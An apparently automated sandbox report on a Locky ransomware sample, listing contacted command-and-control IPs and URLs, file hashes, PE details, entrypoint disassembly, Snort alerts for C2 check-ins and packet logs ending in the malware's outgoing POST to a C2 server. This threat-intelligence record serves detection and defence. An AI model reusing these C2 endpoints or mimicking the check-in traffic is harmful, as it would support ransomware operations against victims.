http://46.17.44.153	LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.179.190.31/imageload.cgin	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgid	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/imageload.cgii	LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/imageload.cgik	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgiP	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.183.165.45/	LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/imageload.cgi0	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.17.44.153	unknown	Russian Federation	51659	ASBAXETRU	true
46.183.165.45	unknown	Russian Federation	197695	AS-REGRU	true
37.143.9.154	unknown	Russian Federation	203226	IHCRUInternet-HostingLtdMoscowRussiaRU	true
185.179.190.31	unknown	Russian Federation	44094	WEBHOST1-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446225
Start date and time:	2024-05-23 01:12:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LockyRansom.exe
Detection:	MAL
Classification:	mal96.rans.evad.winEXE@1/0@0/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: LockyRansom.exe

Simulations

Behavior and APIs

Time	Type	Description
20:22:08	API Interceptor	1x Sleep call for process: LockyRansom.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASBAXETRU	pwguyxhjpT.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	bpx6Q6xdPI.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	O7HAqYMIla.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	rK3zT4c1vM.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	5ywdg9jlhJ.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	SecuriteInfo.com.PUA.Tool.Linux.BtcMine.4274.18395.31150.elf	Get hash	malicious	Xmrig	Browse	46.17.41.146
	gy1E0Bz4tw.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	z7btK4svLL.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	kk6Pr8ufJ8.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
	iiDO5j8jHv.elf	Get hash	malicious	Gafgyt, Mirai	Browse	176.32.38.160
WEBHOST1-ASRU	Nitro.exe	Get hash	malicious	AsyncRAT	Browse	45.84.1.233
	SecuriteInfo.com.Win32.Evo-gen.26417.20881.exe	Get hash	malicious	AsyncRAT	Browse	45.84.1.233
	zY7L2l2Gt6.exe	Get hash	malicious	NetSupport RAT	Browse	45.67.230.205
	zY7L2l2Gt6.exe	Get hash	malicious	NetSupport RAT	Browse	45.67.230.205
	rtn_default.elf	Get hash	malicious	Unknown	Browse	45.84.1.161
	5AgUnnh6yG.exe	Get hash	malicious	AsyncRAT	Browse	45.84.1.233
	DHL_AWB_NO_#907853880911_pdf .exe	Get hash	malicious	AgentTesla	Browse	45.84.1.117
	SKM_C308Cen22092912580_pdf .exe	Get hash	malicious	AgentTesla	Browse	45.84.1.117
	zam#U00f3wienie Z2300056_pdf .exe	Get hash	malicious	Unknown	Browse	45.84.1.117
	ZAM#U00d3WIENIE_DR-5-33499_pdf.exe	Get hash	malicious	AgentTesla	Browse	45.84.1.117
IHCRUInternet-HostingLtdMoscowRussiaRU	KtMg6d1Ivx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.87.199.107
	https://googleads.g.doubleclick.net/pcs/click?xai=AKAOjsuLaMSxRbnmx4CaSYBD7UEX1peDpNeYnMWW4dVza-G52TGjr2vj5pKsC0MnZ5wKKbv48DTu4_9zifCV__nn-40JMtKyE_J-VMT8wv7a1Lf0nNBgkN5ubnqB_fbDSNDoYvSXrEeZ7mt6jhn1Gl78NJ_xm24v553oIbpIcOlySTxRzwS3ROTWKkuLKGhJpg1kkeB-2p7L0D_C0Tx_5HYnjwuOs8n8jzqBq4O3iSh2WW3Es8m8o5Fm3xTlO9UbT5wj7XWQmwefhVbuqmrnfemDwqzjrWGaSNRRqB_R9QTXSQjdFDdWTx0_Oo7RzbAWcjKqQR2JbLAW_ZYkDd6cz8q8BYpJJzzkZ6QKuyXH_CCgkPoul09CafKLox9uieqQMwQ&sai=AMfl-YQSMSxmTEvfKP4k3QH0IYz2PIsK1wo62PVWE2-bo7ZdB4Yue3XhmrRw5NnkQ1uiDEixQcvMUgBuCbvmwfqOzcwUGUmidc9tgXXMjS8Z7zb-8rHzyMziFnJ7Kv7S6gwBuwmLhiK3qougMvlVE4DWmw&sig=Cg0ArKJSzCxoV_8QjjEU&fbs_aeid=%5Bgw_fbsaeid%5D&adurl=https://dubaieventhost.com?26utm_source%3Dacuityads%26utm_medium%3Ddisplay%26utm_campaign%3D23%26utm_content%3D728x90_CyberWeek%26utm_term%3DNOOFR%26dclid%3D%25edclid!	Get hash	malicious	Unknown	Browse	95.183.11.171
	xd.arm.elf	Get hash	malicious	Mirai	Browse	185.22.233.198
	epce3FXdZM.exe	Get hash	malicious	DCRat	Browse	217.144.103.11
	Wcu8q856Mc.elf	Get hash	malicious	Mirai	Browse	185.87.196.219
	https://email-01.moengage.com/v1/emailclick?em=lindamine16%40gmail.com&user_id=%40%24xy%2A%40%21h%C3%9F%03%C2%90%C2%9B%C3%AB%C3%9A%C3%98%C3%B2%C2%B9%C3%B3%05En%7D%17%C2%8E%C3%8F4%C2%93%C2%89%C3%98b%C2%98%1D%C3%9A%13%C2%BA%C2%94%0B%C3%91IZ&d=%40%24xy%2A%40%21ho%15Tz%C2%88%C3%9B%C2%A4%C3%A1%C2%9A%C3%A4%1A3%3E%5D-%C2%AD&cid=%40%24xy%2A%40%21h%2F%C3%AF.%C2%ACH%5D%7C%C2%AErB%C2%BA%C2%9E%C2%84_%21%C2%BD%3Ct%C2%8D%C3%A8%C3%A4TZ%C2%B7%C2%A2A%C2%A8%3B%C3%91%07%5E%C3%AF%5B%C3%8F%C3%A3X%C3%B6%1B+%C2%85V%C2%99%C2%90E%C2%9C9%C2%91%C3%85%01%C2%89%C2%A0%12_%03%C3%A9%16%C2%A9%C3%B9r%C2%87%C3%801%C2%8E%C3%A2%C2%93Q%0Eb%C2%83%C3%AF%C2%B7%C2%B2%C3%A46JP%C3%A6%C2%85%C3%8F%40%C3%B2P%C2%83%C2%B3&ut=l&moeclickid=643d07278baad406b95a7b15_F_T_EM_AB_0_P_0_TIME_2023-04-17+08%3A45%3A55.063339_L_0ecli8&rlink=https%3A%2F%2Fs.free.fr%2F8Jnuegfd	Get hash	malicious	Unknown	Browse	37.143.14.168
	b8bK6XA6sN.exe	Get hash	malicious	DCRat	Browse	217.144.103.26
	djqkablrmx.exe	Get hash	malicious	Unknown	Browse	95.183.12.119
	MHSB7tmAIJ.exe	Get hash	malicious	CryptoWall	Browse	37.143.11.11
	3wjjsE9fZZ.exe	Get hash	malicious	CryptoWall	Browse	37.143.11.11
AS-REGRU	quotation.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	file.exe	Get hash	malicious	Unknown	Browse	31.31.196.120
	FRA.0038253.exe	Get hash	malicious	FormBook, GuLoader	Browse	37.140.192.90
	FRA.0038253.exe	Get hash	malicious	FormBook, GuLoader	Browse	37.140.192.90
	SSDQ115980924.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Payment invoice.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	quote.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Transferencia.exe	Get hash	malicious	FormBook, GuLoader	Browse	31.31.196.77
	OX-IN-031-17_ JPE.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.58.112.174
	SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exe	Get hash	malicious	FormBook	Browse	194.58.112.174

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.785619133351701
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LockyRansom.exe
File size:	614'400 bytes
MD5:	1720b1748ad7b8ac0bfc1c3636fead95
SHA1:	97bae63417df5bde4a05cd44c6c523db50f6ab76
SHA256:	3329641a171508fa6b1ad7674b31431093d46be190d1a51acd77e486f42d9c8e
SHA512:	36d1f098c9ef9a80b42ad058c2a86e5cee794d12f74e479a79059197b82c847d8f88b256f17e2276fc0a9e21cf9b3210c563017d03d9c4ff3638484190a16b76
SSDEEP:	12288:aKVWGHUsNNXxgAQWE9J4TyP5SqWiboPZnVXDsm:/UANB/Q7wqWicLXD
TLSH:	1CD4D09C5380E270F4B405B3558C8FFDC9BAECA147461AAE13F253F1AA027837F5A956
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O1Q.....................x....................@..........................p.............................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40cab5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x51314FC7 [Sat Mar 2 01:03:03 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	87b1bf5d6ea7e7bea778583978f61b64

Entrypoint Preview

Instruction
push eax
mov dword ptr [esp], ebp
inc ecx
mov ebp, esp
sub esp, 30h
cmp bp, FCFEh
jc 00007FDC487B5859h
lea edi, dword ptr [004141B5h]
push dword ptr [edi]
call 00007FDC487B7B11h
push 004141A8h
push 004141A8h
call 00007FDC487BF8A1h
push 004141A8h
push 004141A8h
call 00007FDC487BF892h
mov eax, 0000000Fh
push eax
push 00414180h
push 00414177h
call 00007FDC487B98FAh
test eax, eax
jne 00007FDC487B9125h
mov eax, 0000000Fh
push eax
push 00414180h
push 00414177h
call 00007FDC487B98DDh
test eax, eax
jne 00007FDC487B9108h
lea edi, dword ptr [004045A3h]
call 00007FDC487B603Eh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
lea edx, dword ptr [004141B5h]
push dword ptr [edx]
call 00007FDC487B7A9Bh
push 004141A8h
push 004141A8h
call 00007FDC487BF82Bh
lea edi, dword ptr [004141B5h]
push dword ptr [edi]
call 00007FDC487B7A7Fh
mov eax, 00000010h
push eax
push 00414198h
push 0041418Fh
call 00007FDC497BD628h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x96004	0xb4	.dec
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd6000	0xd70	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1200	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x957bc	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdb54	0xdc00	6bc820bd1ab6433528f62df7c9fd9e1b	False	0.31221590909090907	data	4.910527615535297	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE
.rdata	0xf000	0x86908	0x86a00	d26955b7f888466a914f3c11e80dafc1	False	0.9625261142061281	data	7.910838175775477	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dec	0x96000	0x40000	0x800	cfc2407bbd549a4030bf935f1ea84f16	False	0.576171875	Matlab v4 mat-file (little endian) \274W\011, numeric, rows 614584, columns 0	5.180594554872846	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd6000	0xd70	0xe00	a4235b9c316078526ec2006da1881b10	False	0.08900669642857142	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary	6.426023666341516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
OPS	0xd6170	0x200	Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - right			0.34375
IKQ	0xd6370	0x200	Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - right	English	United States	0.34375
IKQ	0xd6570	0x200	Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - right	English	United States	0.34375
IKQ	0xd6770	0x200	Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - right	English	United States	0.34375
IKQ	0xd6970	0x200	Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - right	English	United States	0.34375
IKQ	0xd6b70	0x200	Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - right	English	United States	0.34375

Imports

DLL	Import
clbcatq.dll	DowngradeAPL, SetSetupSave
cfgmgr32.dll	CM_Add_Empty_Log_Conf, CMP_Report_LogOn, CM_Add_IDA, CM_Add_Range
user32.dll	wsprintfA, LoadBitmapW, IsDialogMessageA, DispatchMessageW, PostMessageW, CharToOemA, LoadIconA, IsCharLowerW, DialogBoxParamA, MessageBoxA, GetClassLongA, DrawStateW, PeekMessageW, InsertMenuW
cryptdll.dll	MD5Update, MD5Final
kernel32.dll	GetCommandLineW, InterlockedIncrement, CreateNamedPipeA, GetEnvironmentVariableW, WaitForSingleObject, GetLocalTime, CreateThread, GetModuleFileNameW, FindClose, FindResourceExA, OpenProcess, GlobalAddAtomA, GetConsoleTitleA, SetPriorityClass, FindNextFileW, CreateFileMappingW, FindFirstFileW, FormatMessageA, CloseHandle, GetLogicalDriveStringsA, GetProcAddress, GetPrivateProfileStringA, CreateDirectoryA, CreateSemaphoreW, LoadLibraryA, SetEnvironmentVariableA, GetModuleHandleA
shlwapi.dll	UrlGetPartW, PathCompactPathW, UrlCreateFromPathW, UrlCombineA, UrlEscapeW, UrlCompareW, UrlUnescapeW, PathIsRootW, UrlHashA, UrlIsNoHistoryW, UrlGetLocationA, PathCommonPrefixW, UrlIsW, PathCombineA
rsaenh.dll	CPDecrypt, CPDeriveKey
shell32.dll	Shell_NotifyIconA, DllCanUnloadNow, DragQueryFileA, DllGetVersion, SHBrowseForFolderW, SHGetFolderPathA, StrChrA, ExtractIconW, SHEmptyRecycleBinA, SHCreateDirectoryExA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/23/24-01:13:30.810315	TCP	2023551	ET TROJAN Locky CnC checkin Nov 21	49704	80	192.168.2.7	185.179.190.31
05/23/24-01:13:53.178351	TCP	2023551	ET TROJAN Locky CnC checkin Nov 21	49706	80	192.168.2.7	46.17.44.153
05/23/24-01:13:53.178351	TCP	2023577	ET TROJAN Locky CnC Checkin HTTP Pattern	49706	80	192.168.2.7	46.17.44.153
05/23/24-01:13:53.178351	TCP	2023552	ET TROJAN Locky CnC checkin Nov 21 M2	49706	80	192.168.2.7	46.17.44.153
05/23/24-01:13:52.300122	TCP	2023551	ET TROJAN Locky CnC checkin Nov 21	49705	80	192.168.2.7	37.143.9.154
05/23/24-01:13:52.300122	TCP	2023552	ET TROJAN Locky CnC checkin Nov 21 M2	49705	80	192.168.2.7	37.143.9.154
05/23/24-01:13:52.300122	TCP	2023577	ET TROJAN Locky CnC Checkin HTTP Pattern	49705	80	192.168.2.7	37.143.9.154
05/23/24-01:14:14.647859	TCP	2023552	ET TROJAN Locky CnC checkin Nov 21 M2	49708	80	192.168.2.7	46.183.165.45
05/23/24-01:14:36.143686	TCP	2023577	ET TROJAN Locky CnC Checkin HTTP Pattern	49709	80	192.168.2.7	185.179.190.31
05/23/24-01:14:58.402198	TCP	2023551	ET TROJAN Locky CnC checkin Nov 21	49711	80	192.168.2.7	46.17.44.153
05/23/24-01:14:14.647859	TCP	2023551	ET TROJAN Locky CnC checkin Nov 21	49708	80	192.168.2.7	46.183.165.45
05/23/24-01:14:57.599658	TCP	2023577	ET TROJAN Locky CnC Checkin HTTP Pattern	49710	80	192.168.2.7	37.143.9.154
05/23/24-01:14:58.402198	TCP	2023552	ET TROJAN Locky CnC checkin Nov 21 M2	49711	80	192.168.2.7	46.17.44.153
05/23/24-01:14:36.143686	TCP	2023552	ET TROJAN Locky CnC checkin Nov 21 M2	49709	80	192.168.2.7	185.179.190.31
05/23/24-01:14:36.143686	TCP	2023551	ET TROJAN Locky CnC checkin Nov 21	49709	80	192.168.2.7	185.179.190.31
05/23/24-01:14:58.402198	TCP	2023577	ET TROJAN Locky CnC Checkin HTTP Pattern	49711	80	192.168.2.7	46.17.44.153
05/23/24-01:14:14.647859	TCP	2023577	ET TROJAN Locky CnC Checkin HTTP Pattern	49708	80	192.168.2.7	46.183.165.45
05/23/24-01:14:57.599658	TCP	2023551	ET TROJAN Locky CnC checkin Nov 21	49710	80	192.168.2.7	37.143.9.154
05/23/24-01:14:57.599658	TCP	2023552	ET TROJAN Locky CnC checkin Nov 21 M2	49710	80	192.168.2.7	37.143.9.154
05/23/24-01:13:30.810315	TCP	2023577	ET TROJAN Locky CnC Checkin HTTP Pattern	49704	80	192.168.2.7	185.179.190.31
05/23/24-01:13:30.810315	TCP	2023552	ET TROJAN Locky CnC checkin Nov 21 M2	49704	80	192.168.2.7	185.179.190.31

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 01:13:30.803800106 CEST	49704	80	192.168.2.7	185.179.190.31
May 23, 2024 01:13:30.809298038 CEST	80	49704	185.179.190.31	192.168.2.7
May 23, 2024 01:13:30.809405088 CEST	49704	80	192.168.2.7	185.179.190.31
May 23, 2024 01:13:30.810314894 CEST	49704	80	192.168.2.7	185.179.190.31
May 23, 2024 01:13:30.810343981 CEST	49704	80	192.168.2.7	185.179.190.31
May 23, 2024 01:13:30.865405083 CEST	80	49704	185.179.190.31	192.168.2.7
May 23, 2024 01:13:30.915318012 CEST	80	49704	185.179.190.31	192.168.2.7
May 23, 2024 01:13:52.199529886 CEST	80	49704	185.179.190.31	192.168.2.7
May 23, 2024 01:13:52.199759007 CEST	49704	80	192.168.2.7	185.179.190.31
May 23, 2024 01:13:52.200572968 CEST	49704	80	192.168.2.7	185.179.190.31
May 23, 2024 01:13:52.202433109 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:52.253406048 CEST	80	49704	185.179.190.31	192.168.2.7
May 23, 2024 01:13:52.299529076 CEST	80	49705	37.143.9.154	192.168.2.7
May 23, 2024 01:13:52.299807072 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:52.300122023 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:52.300122976 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:52.353425026 CEST	80	49705	37.143.9.154	192.168.2.7
May 23, 2024 01:13:52.399514914 CEST	80	49705	37.143.9.154	192.168.2.7
May 23, 2024 01:13:53.120646000 CEST	80	49705	37.143.9.154	192.168.2.7
May 23, 2024 01:13:53.120884895 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:53.121176958 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:53.121211052 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:53.122760057 CEST	49706	80	192.168.2.7	46.17.44.153
May 23, 2024 01:13:53.126065016 CEST	80	49705	37.143.9.154	192.168.2.7
May 23, 2024 01:13:53.126097918 CEST	80	49705	37.143.9.154	192.168.2.7
May 23, 2024 01:13:53.126136065 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:53.126178980 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:53.173387051 CEST	80	49705	37.143.9.154	192.168.2.7
May 23, 2024 01:13:53.173538923 CEST	49705	80	192.168.2.7	37.143.9.154
May 23, 2024 01:13:53.178014040 CEST	80	49706	46.17.44.153	192.168.2.7
May 23, 2024 01:13:53.178118944 CEST	49706	80	192.168.2.7	46.17.44.153
May 23, 2024 01:13:53.178350925 CEST	49706	80	192.168.2.7	46.17.44.153
May 23, 2024 01:13:53.178380013 CEST	49706	80	192.168.2.7	46.17.44.153
May 23, 2024 01:13:53.225675106 CEST	80	49706	46.17.44.153	192.168.2.7
May 23, 2024 01:13:53.271348953 CEST	80	49706	46.17.44.153	192.168.2.7
May 23, 2024 01:14:14.586029053 CEST	80	49706	46.17.44.153	192.168.2.7
May 23, 2024 01:14:14.586332083 CEST	49706	80	192.168.2.7	46.17.44.153
May 23, 2024 01:14:14.586779118 CEST	49706	80	192.168.2.7	46.17.44.153
May 23, 2024 01:14:14.589165926 CEST	49708	80	192.168.2.7	46.183.165.45
May 23, 2024 01:14:14.596303940 CEST	80	49706	46.17.44.153	192.168.2.7
May 23, 2024 01:14:14.647488117 CEST	80	49708	46.183.165.45	192.168.2.7
May 23, 2024 01:14:14.647655964 CEST	49708	80	192.168.2.7	46.183.165.45
May 23, 2024 01:14:14.647859097 CEST	49708	80	192.168.2.7	46.183.165.45
May 23, 2024 01:14:14.647880077 CEST	49708	80	192.168.2.7	46.183.165.45
May 23, 2024 01:14:14.701381922 CEST	80	49708	46.183.165.45	192.168.2.7
May 23, 2024 01:14:14.747514963 CEST	80	49708	46.183.165.45	192.168.2.7
May 23, 2024 01:14:36.086546898 CEST	80	49708	46.183.165.45	192.168.2.7
May 23, 2024 01:14:36.086848021 CEST	49708	80	192.168.2.7	46.183.165.45
May 23, 2024 01:14:36.087313890 CEST	49708	80	192.168.2.7	46.183.165.45
May 23, 2024 01:14:36.094095945 CEST	49709	80	192.168.2.7	185.179.190.31
May 23, 2024 01:14:36.097479105 CEST	80	49708	46.183.165.45	192.168.2.7
May 23, 2024 01:14:36.143347979 CEST	80	49709	185.179.190.31	192.168.2.7
May 23, 2024 01:14:36.143445969 CEST	49709	80	192.168.2.7	185.179.190.31
May 23, 2024 01:14:36.143686056 CEST	49709	80	192.168.2.7	185.179.190.31
May 23, 2024 01:14:36.143735886 CEST	49709	80	192.168.2.7	185.179.190.31
May 23, 2024 01:14:36.193267107 CEST	80	49709	185.179.190.31	192.168.2.7
May 23, 2024 01:14:36.239310980 CEST	80	49709	185.179.190.31	192.168.2.7
May 23, 2024 01:14:57.544363976 CEST	80	49709	185.179.190.31	192.168.2.7
May 23, 2024 01:14:57.544466972 CEST	49709	80	192.168.2.7	185.179.190.31
May 23, 2024 01:14:57.544642925 CEST	49709	80	192.168.2.7	185.179.190.31
May 23, 2024 01:14:57.546190977 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:57.554361105 CEST	80	49709	185.179.190.31	192.168.2.7
May 23, 2024 01:14:57.599268913 CEST	80	49710	37.143.9.154	192.168.2.7
May 23, 2024 01:14:57.599383116 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:57.599658012 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:57.599693060 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:57.649346113 CEST	80	49710	37.143.9.154	192.168.2.7
May 23, 2024 01:14:57.696218014 CEST	80	49710	37.143.9.154	192.168.2.7
May 23, 2024 01:14:58.379328012 CEST	80	49710	37.143.9.154	192.168.2.7
May 23, 2024 01:14:58.379419088 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:58.379585981 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:58.379615068 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:58.380893946 CEST	49711	80	192.168.2.7	46.17.44.153
May 23, 2024 01:14:58.386002064 CEST	80	49710	37.143.9.154	192.168.2.7
May 23, 2024 01:14:58.386013031 CEST	80	49710	37.143.9.154	192.168.2.7
May 23, 2024 01:14:58.386066914 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:58.386066914 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:58.394542933 CEST	80	49710	37.143.9.154	192.168.2.7
May 23, 2024 01:14:58.394776106 CEST	49710	80	192.168.2.7	37.143.9.154
May 23, 2024 01:14:58.401979923 CEST	80	49711	46.17.44.153	192.168.2.7
May 23, 2024 01:14:58.402061939 CEST	49711	80	192.168.2.7	46.17.44.153
May 23, 2024 01:14:58.402198076 CEST	49711	80	192.168.2.7	46.17.44.153
May 23, 2024 01:14:58.402218103 CEST	49711	80	192.168.2.7	46.17.44.153
May 23, 2024 01:14:58.463649035 CEST	80	49711	46.17.44.153	192.168.2.7
May 23, 2024 01:14:58.512361050 CEST	80	49711	46.17.44.153	192.168.2.7

HTTP Request Dependency Graph

185.179.190.31

37.143.9.154

46.17.44.153

46.183.165.45

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	185.179.190.31	80	6924	C:\Users\user\Desktop\LockyRansom.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 01:13:30.810314894 CEST	473	OUT	POST /imageload.cgi HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://185.179.190.31/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.179.190.31 Content-Length: 613 Connection: Keep-Alive
